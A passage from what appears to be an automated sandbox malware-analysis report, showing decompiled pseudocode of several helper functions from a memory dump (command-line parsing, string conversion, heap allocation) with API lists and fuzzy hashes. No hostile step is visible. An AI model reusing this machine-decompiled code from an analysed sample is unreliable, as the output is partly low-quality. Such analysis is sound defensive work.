							goto L23;
						}
						_t11 =  &(_t11[1]);
						_t32 = _t11;
						_t18 =  *_t11 & 0x0000ffff;
						if(_t18 == 0) {
							goto L22;
						}
						_t29 = 0x22;
						while(_t18 != _t29) {
							_t11 =  &(_t11[1]);
							_t18 =  *_t11 & 0x0000ffff;
							if(_t18 != 0) {
								continue;
							}
							goto L10;
						}
						goto L10;
					}
					_t30 = 0x20;
					do {
						_t11 =  &(_t11[1]);
					} while ( *_t11 == _t30);
					goto L5;
					L27:
					if(_t26 != 0) {
						_t15 = _t15 + 1;
					}
					_t32 = 0;
					_t24 =  *_t11 & 0x0000ffff;
				} while (_t24 != 0);
				goto L30;
			}





















                                                                                                                                                                      0x004096e6
                                                                                                                                                                      0x004096ed
                                                                                                                                                                      0x004096f2
                                                                                                                                                                      0x004096f4
                                                                                                                                                                      0x004096fa
                                                                                                                                                                      0x004096fe
                                                                                                                                                                      0x00409704
                                                                                                                                                                      0x004097da
                                                                                                                                                                      0x004097dc
                                                                                                                                                                      0x004097f3
                                                                                                                                                                      0x004097f5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097f5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097de
                                                                                                                                                                      0x0040970a
                                                                                                                                                                      0x0040970e
                                                                                                                                                                      0x00409716
                                                                                                                                                                      0x0040971e
                                                                                                                                                                      0x00409723
                                                                                                                                                                      0x00409730
                                                                                                                                                                      0x00409730
                                                                                                                                                                      0x00409733
                                                                                                                                                                      0x00409740
                                                                                                                                                                      0x00409773
                                                                                                                                                                      0x004097ba
                                                                                                                                                                      0x004097bc
                                                                                                                                                                      0x004097bf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097e2
                                                                                                                                                                      0x004097e4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097ec
                                                                                                                                                                      0x004097ee
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097ee
                                                                                                                                                                      0x004097bf
                                                                                                                                                                      0x00409777
                                                                                                                                                                      0x00409779
                                                                                                                                                                      0x0040977a
                                                                                                                                                                      0x0040977f
                                                                                                                                                                      0x00409784
                                                                                                                                                                      0x00409788
                                                                                                                                                                      0x004097a8
                                                                                                                                                                      0x004097a8
                                                                                                                                                                      0x004097ae
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097b0
                                                                                                                                                                      0x0040978a
                                                                                                                                                                      0x0040978d
                                                                                                                                                                      0x00409793
                                                                                                                                                                      0x004097b2
                                                                                                                                                                      0x004097b2
                                                                                                                                                                      0x004097b4
                                                                                                                                                                      0x004097b4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097b4
                                                                                                                                                                      0x00409795
                                                                                                                                                                      0x0040979a
                                                                                                                                                                      0x0040979d
                                                                                                                                                                      0x004097a3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097a3
                                                                                                                                                                      0x004097a7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097a7
                                                                                                                                                                      0x00409762
                                                                                                                                                                      0x00409767
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409769
                                                                                                                                                                      0x0040976b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040976b
                                                                                                                                                                      0x00409742
                                                                                                                                                                      0x00409745
                                                                                                                                                                      0x00409747
                                                                                                                                                                      0x0040974d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409751
                                                                                                                                                                      0x00409752
                                                                                                                                                                      0x00409757
                                                                                                                                                                      0x0040975a
                                                                                                                                                                      0x00409760
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409760
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409752
                                                                                                                                                                      0x00409727
                                                                                                                                                                      0x00409728
                                                                                                                                                                      0x00409728
                                                                                                                                                                      0x0040972b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004097c5
                                                                                                                                                                      0x004097c7
                                                                                                                                                                      0x004097c9
                                                                                                                                                                      0x004097c9
                                                                                                                                                                      0x004097cc
                                                                                                                                                                      0x004097ce
                                                                                                                                                                      0x004097d1
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040D288: TlsGetValue.KERNEL32(?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000,00000000,00000200), ref: 0040D28F
                                                                                                                                                                        • Part of subcall function 0040D288: HeapAlloc.KERNEL32(00000008,?,?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D2AA
                                                                                                                                                                        • Part of subcall function 0040D288: TlsSetValue.KERNEL32(00000000,?,?,00409809,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000,00000000,00000000), ref: 0040D2B9
                                                                                                                                                                      • GetCommandLineW.KERNEL32(?,?,?,00000000,?,?,00409810,00000000,00401DAB,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015), ref: 004096F4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$AllocCommandHeapLine
                                                                                                                                                                      • String ID: $"
                                                                                                                                                                      • API String ID: 1339485270-3817095088
                                                                                                                                                                      • Opcode ID: f97b4f0fc6cdbdc4f126a07b0d6f143b00e44276b0d28f9304cf3883811f345f
                                                                                                                                                                      • Instruction ID: 4c648ba0253d95f00ea60fdf00931512a06ba22242bcbe44c620df30a2d3858e
                                                                                                                                                                      • Opcode Fuzzy Hash: f97b4f0fc6cdbdc4f126a07b0d6f143b00e44276b0d28f9304cf3883811f345f
                                                                                                                                                                      • Instruction Fuzzy Hash: 6031A473525221CADB749F24981137772A1EBB1B60F18817FE8926B3C2F37D8D419359
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409F58, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 25%
                                                                                                                                                                      			E00409F58(intOrPtr* _a4, wchar_t* _a8) {
				signed int _t36;
				intOrPtr _t38;
				wchar_t* _t39;
				intOrPtr* _t50;
				intOrPtr* _t51;
				signed int _t52;

				_t39 = _a8;
				if(_t39 == 0) {
					_t39 = 0x412024;
				}
				_t51 = _a4;
				_push(_t39);
				if(( *(_t51 + 0x2c) & 0x00000001) == 0) {
					_t52 = E0040A24F() %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + _t52 * 4));
					while(_t50 != 0) {
						if(wcscmp( *(_t50 + 4), _t39) == 0) {
							goto L8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					goto L13;
				} else {
					_t36 = E0040A26A();
					_t38 =  *((intOrPtr*)(_t51 + 4));
					_t52 = _t36 %  *(_t51 + 0x24);
					_t50 =  *((intOrPtr*)(_t38 + _t52 * 4));
					while(_t50 != 0) {
						_push(_t39);
						_push( *(_t50 + 4));
						L0040531F();
						if(_t38 == 0) {
							L8:
							 *(_t51 + 0x14) = _t52;
							 *_t51 = _t50;
							return _t50 + 8;
						}
						 *((intOrPtr*)(_t51 + 8)) = _t50;
						_t50 =  *_t50;
					}
					L13:
					return 0;
				}
			}









                                                                                                                                                                      0x00409f59
                                                                                                                                                                      0x00409f62
                                                                                                                                                                      0x00409f64
                                                                                                                                                                      0x00409f64
                                                                                                                                                                      0x00409f69
                                                                                                                                                                      0x00409f6d
                                                                                                                                                                      0x00409f72
                                                                                                                                                                      0x00409fba
                                                                                                                                                                      0x00409fbd
                                                                                                                                                                      0x00409fd6
                                                                                                                                                                      0x00409fcf
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409fd1
                                                                                                                                                                      0x00409fd4
                                                                                                                                                                      0x00409fd4
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409f74
                                                                                                                                                                      0x00409f74
                                                                                                                                                                      0x00409f7e
                                                                                                                                                                      0x00409f81
                                                                                                                                                                      0x00409f84
                                                                                                                                                                      0x00409f9d
                                                                                                                                                                      0x00409f89
                                                                                                                                                                      0x00409f8a
                                                                                                                                                                      0x00409f8d
                                                                                                                                                                      0x00409f96
                                                                                                                                                                      0x00409fa3
                                                                                                                                                                      0x00409fa3
                                                                                                                                                                      0x00409fa9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409fa9
                                                                                                                                                                      0x00409f98
                                                                                                                                                                      0x00409f9b
                                                                                                                                                                      0x00409f9b
                                                                                                                                                                      0x00409fda
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00409fda

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmpwcscmp
                                                                                                                                                                      • String ID: $ A
                                                                                                                                                                      • API String ID: 3419221977-1415209610
                                                                                                                                                                      • Opcode ID: f21810243c52a83e43149c8ba45ed39ee43fe6731525ce4266dde6b58930fcab
                                                                                                                                                                      • Instruction ID: a733317a4b81313ba419c318017c22e6bf29b3e2c3e1e122568c9b8a7727cdd0
                                                                                                                                                                      • Opcode Fuzzy Hash: f21810243c52a83e43149c8ba45ed39ee43fe6731525ce4266dde6b58930fcab
                                                                                                                                                                      • Instruction Fuzzy Hash: 1111BFB2108B028FD3209F16D440923B3E9EFC8360324843FE849A3792DB79FC118A69
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405700, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00405700(short* _a4) {
				char* _t6;
				short* _t7;
				int _t8;

				_t7 = _a4;
				if(_t7 == 0) {
					_t7 = 0x412024;
				}
				_t8 = WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, 0, 0, 0, 0);
				_t6 = E00409B40(_t8);
				if(_t6 != 0) {
					WideCharToMultiByte(0xfde9, 0, _t7, 0xffffffff, _t6, _t8, 0, 0);
				}
				return _t6;
			}






                                                                                                                                                                      0x00405702
                                                                                                                                                                      0x00405709
                                                                                                                                                                      0x0040570b
                                                                                                                                                                      0x0040570b
                                                                                                                                                                      0x00405728
                                                                                                                                                                      0x00405730
                                                                                                                                                                      0x00405734
                                                                                                                                                                      0x00405746
                                                                                                                                                                      0x00405746
                                                                                                                                                                      0x00405751

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405722
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,?,00401207), ref: 00405746
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID: $ A
                                                                                                                                                                      • API String ID: 626452242-1415209610
                                                                                                                                                                      • Opcode ID: ca72461ec9b0f3d02c9927fa16f8ee0024e96a70de694c605e1f9d49a19121eb
                                                                                                                                                                      • Instruction ID: 51e3e9442c1b14bfca279b8410f0cbc31bbd530ab1d9b24216a3048053e00ad1
                                                                                                                                                                      • Opcode Fuzzy Hash: ca72461ec9b0f3d02c9927fa16f8ee0024e96a70de694c605e1f9d49a19121eb
                                                                                                                                                                      • Instruction Fuzzy Hash: FFF0303638522176E231215A5C06F576A59C785F70F264236BB24BF2C585A1680059AC
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D51F, Relevance: 5.1, APIs: 4, Instructions: 134memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040D51F(char _a4) {
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t78;
				signed int _t81;
				intOrPtr _t83;
				signed int _t84;
				intOrPtr _t85;
				long _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;

				_t88 = _a4;
				_t87 = 0;
				_t91 = 0;
				if( *((intOrPtr*)(_t88 + 0x1c)) != 0) {
					EnterCriticalSection(_t88 + 0x20);
					_t87 = 0;
				}
				_t89 =  *((intOrPtr*)(_t88 + 4));
				if(_t89 == 0) {
					_t78 =  *(_t88 + 0xc) >> 0x00000004 & 0xfffffff0;
					if(_t78 >=  *(_t88 + 0x14)) {
						if(_t78 >  *(_t88 + 0x18)) {
							_t78 =  *(_t88 + 0x18);
						}
					} else {
						_t78 =  *(_t88 + 0x14);
					}
					_t90 = HeapAlloc( *0x417008, _t87,  *(_t88 + 0x10) * _t78 + 0x18);
					_t81 = 1;
					if(_t90 == 0) {
						_t90 = HeapAlloc( *0x417008, 0,  *(_t88 + 0x10) + 0x18);
						if(_t90 == 0) {
							_t87 = 0;
							goto L30;
						}
						_t81 = 1;
						 *(_t90 + 0xc) = 1;
						goto L23;
					} else {
						 *(_t90 + 0xc) = _t78;
						L23:
						_t87 = 0;
						 *(_t88 + 0xc) =  *(_t88 + 0xc) +  *(_t90 + 0xc);
						 *((intOrPtr*)(_t90 + 0x10)) = _t81;
						 *((intOrPtr*)(_t90 + 0x14)) = 0;
						 *((intOrPtr*)(_t90 + 8)) = 0;
						if( *(_t90 + 0xc) <= _t81) {
							 *_t90 =  *_t88;
							 *((intOrPtr*)(_t90 + 4)) = 0;
							 *_t88 = _t90;
						} else {
							 *_t90 =  *((intOrPtr*)(_t88 + 4));
							 *((intOrPtr*)(_t90 + 4)) = 0;
							 *((intOrPtr*)(_t88 + 4)) = _t90;
						}
						_t62 =  *_t90;
						if(_t62 != 0) {
							 *((intOrPtr*)(_t62 + 4)) = _t90;
						}
						_t46 = _t90 + 0x18; // 0x18
						_t91 = _t46;
						L30:
						goto L31;
					}
				} else {
					_t83 =  *((intOrPtr*)(_t89 + 0x14));
					if(_t83 <= 0) {
						_t84 =  *(_t89 + 0x10);
						_t91 = _t89 + 0x18 +  *(_t88 + 0x10) * _t84;
						_t13 = _t84 + 1; // 0x1
						 *(_t89 + 0x10) = _t13;
					} else {
						_t91 =  *((intOrPtr*)(_t89 + 8));
						 *((intOrPtr*)(_t89 + 8)) =  *_t91;
						_t8 = _t83 - 1; // -1
						 *((intOrPtr*)(_t89 + 0x14)) = _t8;
					}
					if( *((intOrPtr*)(_t89 + 0x14)) == _t87 &&  *(_t89 + 0x10) >=  *((intOrPtr*)(_t89 + 0xc))) {
						_t85 =  *_t89;
						if(_t85 != 0) {
							 *(_t85 + 4) =  *(_t89 + 4);
						}
						_t68 =  *_t89;
						if(_t89 !=  *((intOrPtr*)(_t88 + 4))) {
							 *( *(_t89 + 4)) = _t68;
						} else {
							 *((intOrPtr*)(_t88 + 4)) = _t68;
						}
						 *_t89 =  *_t88;
						 *(_t89 + 4) = _t87;
						 *_t88 = _t89;
						_t70 =  *_t89;
						if(_t70 != 0) {
							 *((intOrPtr*)(_t70 + 4)) = _t89;
						}
					}
					L31:
					if( *((intOrPtr*)(_t88 + 0x1c)) != _t87) {
						LeaveCriticalSection(_t88 + 0x20);
					}
					if(_t91 == 0) {
						return 0;
					} else {
						 *_t91 = _t90;
						_t49 =  &_a4; // 0x4
						return _t49;
					}
				}
			}
















                                                                                                                                                                      0x0040d522
                                                                                                                                                                      0x0040d526
                                                                                                                                                                      0x0040d528
                                                                                                                                                                      0x0040d52d
                                                                                                                                                                      0x0040d533
                                                                                                                                                                      0x0040d539
                                                                                                                                                                      0x0040d539
                                                                                                                                                                      0x0040d53b
                                                                                                                                                                      0x0040d540
                                                                                                                                                                      0x0040d5c2
                                                                                                                                                                      0x0040d5c8
                                                                                                                                                                      0x0040d5d2
                                                                                                                                                                      0x0040d5d4
                                                                                                                                                                      0x0040d5d4
                                                                                                                                                                      0x0040d5ca
                                                                                                                                                                      0x0040d5ca
                                                                                                                                                                      0x0040d5ca
                                                                                                                                                                      0x0040d5f0
                                                                                                                                                                      0x0040d5f2
                                                                                                                                                                      0x0040d5f5
                                                                                                                                                                      0x0040d611
                                                                                                                                                                      0x0040d615
                                                                                                                                                                      0x0040d657
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d657
                                                                                                                                                                      0x0040d619
                                                                                                                                                                      0x0040d61a
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d5f7
                                                                                                                                                                      0x0040d5f7
                                                                                                                                                                      0x0040d61d
                                                                                                                                                                      0x0040d620
                                                                                                                                                                      0x0040d622
                                                                                                                                                                      0x0040d625
                                                                                                                                                                      0x0040d628
                                                                                                                                                                      0x0040d62b
                                                                                                                                                                      0x0040d631
                                                                                                                                                                      0x0040d642
                                                                                                                                                                      0x0040d644
                                                                                                                                                                      0x0040d647
                                                                                                                                                                      0x0040d633
                                                                                                                                                                      0x0040d636
                                                                                                                                                                      0x0040d638
                                                                                                                                                                      0x0040d63b
                                                                                                                                                                      0x0040d63b
                                                                                                                                                                      0x0040d649
                                                                                                                                                                      0x0040d64d
                                                                                                                                                                      0x0040d64f
                                                                                                                                                                      0x0040d64f
                                                                                                                                                                      0x0040d652
                                                                                                                                                                      0x0040d652
                                                                                                                                                                      0x0040d659
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d659
                                                                                                                                                                      0x0040d542
                                                                                                                                                                      0x0040d542
                                                                                                                                                                      0x0040d547
                                                                                                                                                                      0x0040d55a
                                                                                                                                                                      0x0040d566
                                                                                                                                                                      0x0040d568
                                                                                                                                                                      0x0040d56b
                                                                                                                                                                      0x0040d549
                                                                                                                                                                      0x0040d549
                                                                                                                                                                      0x0040d54f
                                                                                                                                                                      0x0040d552
                                                                                                                                                                      0x0040d555
                                                                                                                                                                      0x0040d555
                                                                                                                                                                      0x0040d571
                                                                                                                                                                      0x0040d583
                                                                                                                                                                      0x0040d587
                                                                                                                                                                      0x0040d58c
                                                                                                                                                                      0x0040d58c
                                                                                                                                                                      0x0040d58f
                                                                                                                                                                      0x0040d594
                                                                                                                                                                      0x0040d59e
                                                                                                                                                                      0x0040d596
                                                                                                                                                                      0x0040d596
                                                                                                                                                                      0x0040d596
                                                                                                                                                                      0x0040d5a2
                                                                                                                                                                      0x0040d5a4
                                                                                                                                                                      0x0040d5a7
                                                                                                                                                                      0x0040d5a9
                                                                                                                                                                      0x0040d5ad
                                                                                                                                                                      0x0040d5b3
                                                                                                                                                                      0x0040d5b3
                                                                                                                                                                      0x0040d5ad
                                                                                                                                                                      0x0040d65a
                                                                                                                                                                      0x0040d65d
                                                                                                                                                                      0x0040d663
                                                                                                                                                                      0x0040d663
                                                                                                                                                                      0x0040d66b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d66d
                                                                                                                                                                      0x0040d66d
                                                                                                                                                                      0x0040d670
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040d670
                                                                                                                                                                      0x0040d66b

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?), ref: 0040D533
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?), ref: 0040D5E8
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000), ref: 0040D60B
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?,?), ref: 0040D663
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocCriticalHeapSection$EnterLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 830345296-0
                                                                                                                                                                      • Opcode ID: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
                                                                                                                                                                      • Instruction ID: c75203acf5dbc6b13cd53f4330a4279d02754d6c9a51f963ab4d277c9f4d2c3e
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
                                                                                                                                                                      • Instruction Fuzzy Hash: 67510570900B02AFC324CF69D980922B7F4FF587147108A3EE8AA97A94D335F959CB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040E0D0, Relevance: 5.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E0040E0D0(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t40;
				void* _t43;
				void* _t45;

				_v8 = 0;
				if(_a8 == 0) {
					if( *_a4 != 0) {
						_t40 =  *0x417720; // 0x2370000
						HeapFree(_t40, 0,  *_a4);
						 *_a4 = 0;
					}
				} else {
					_v8 = wcslen(_a8);
					if( *_a4 != 0) {
						_t12 = _v8 + 0xa; // 0xa
						_t43 =  *0x417720; // 0x2370000
						 *_a4 = HeapReAlloc(_t43, 0,  *_a4, _v8 + _t12);
					} else {
						_t8 = _v8 + 0xa; // 0xa
						_t45 =  *0x417720; // 0x2370000
						 *_a4 = HeapAlloc(_t45, 0, _v8 + _t8);
					}
					E0040E300(_a8,  *_a4, _a8, _v8);
				}
				return _v8 + _v8 + 2;
			}







                                                                                                                                                                      0x0040e0d4
                                                                                                                                                                      0x0040e0df
                                                                                                                                                                      0x0040e153
                                                                                                                                                                      0x0040e15d
                                                                                                                                                                      0x0040e164
                                                                                                                                                                      0x0040e16d
                                                                                                                                                                      0x0040e16d
                                                                                                                                                                      0x0040e0e1
                                                                                                                                                                      0x0040e0ed
                                                                                                                                                                      0x0040e0f6
                                                                                                                                                                      0x0040e119
                                                                                                                                                                      0x0040e126
                                                                                                                                                                      0x0040e136
                                                                                                                                                                      0x0040e0f8
                                                                                                                                                                      0x0040e0fb
                                                                                                                                                                      0x0040e102
                                                                                                                                                                      0x0040e112
                                                                                                                                                                      0x0040e112
                                                                                                                                                                      0x0040e146
                                                                                                                                                                      0x0040e146
                                                                                                                                                                      0x0040e17d

                                                                                                                                                                      APIs
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040E0E5
                                                                                                                                                                      • HeapAlloc.KERNEL32(02370000,00000000,0000000A), ref: 0040E109
                                                                                                                                                                      • HeapReAlloc.KERNEL32(02370000,00000000,00000000,0000000A), ref: 0040E12D
                                                                                                                                                                      • HeapFree.KERNEL32(02370000,00000000,00000000,?,?,0040506F,?,0041602A,00401095,00000000), ref: 0040E164
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Heap$Alloc$Freewcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2479713791-0
                                                                                                                                                                      • Opcode ID: f5b77000bbf8e4bbffd1e92e25ea49c26a95bf6dea2a94c690576bfd34a48491
                                                                                                                                                                      • Instruction ID: 5c25edb19946727406606906c76980e1d10e687976c030b77a126e3da493f9c6
                                                                                                                                                                      • Opcode Fuzzy Hash: f5b77000bbf8e4bbffd1e92e25ea49c26a95bf6dea2a94c690576bfd34a48491
                                                                                                                                                                      • Instruction Fuzzy Hash: BD212774604209EFDB04CF94D884FAAB7BAFB48354F108569F9099F390D735EA41CB94
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D438, Relevance: 5.1, APIs: 4, Instructions: 56memoryCOMMON
